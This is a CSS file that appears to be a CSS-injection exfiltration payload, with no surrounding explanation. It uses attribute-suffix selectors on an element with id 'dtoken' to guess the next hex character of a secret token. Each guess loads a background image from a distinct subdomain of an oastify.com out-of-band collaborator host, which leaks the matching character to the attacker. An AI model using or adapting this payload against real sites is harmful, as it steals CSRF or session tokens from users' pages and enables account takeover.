meta, head {
    display: block;
}

#dtoken[content$="ac4063861e203f"]{
    background: url(https://a.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="bc4063861e203f"]{
    background: url(https://b.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="cc4063861e203f"]{
    background: url(https://c.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="dc4063861e203f"]{
    background: url(https://d.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="ec4063861e203f"]{
    background: url(https://e.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="fc4063861e203f"]{
    background: url(https://f.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="0c4063861e203f"]{
    background: url(https://0.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="1c4063861e203f"]{
    background: url(https://1.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="2c4063861e203f"]{
    background: url(https://2.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="3c4063861e203f"]{
    background: url(https://3.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="4c4063861e203f"]{
    background: url(https://4.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="5c4063861e203f"]{
    background: url(https://5.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="6c4063861e203f"]{
    background: url(https://6.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="7c4063861e203f"]{
    background: url(https://7.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="8c4063861e203f"]{
    background: url(https://8.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}

#dtoken[content$="9c4063861e203f"]{
    background: url(https://9.c4063861e203f.ub9zh3mc3n9m727mpuwd8bh0krqieh26.oastify.com/);
}
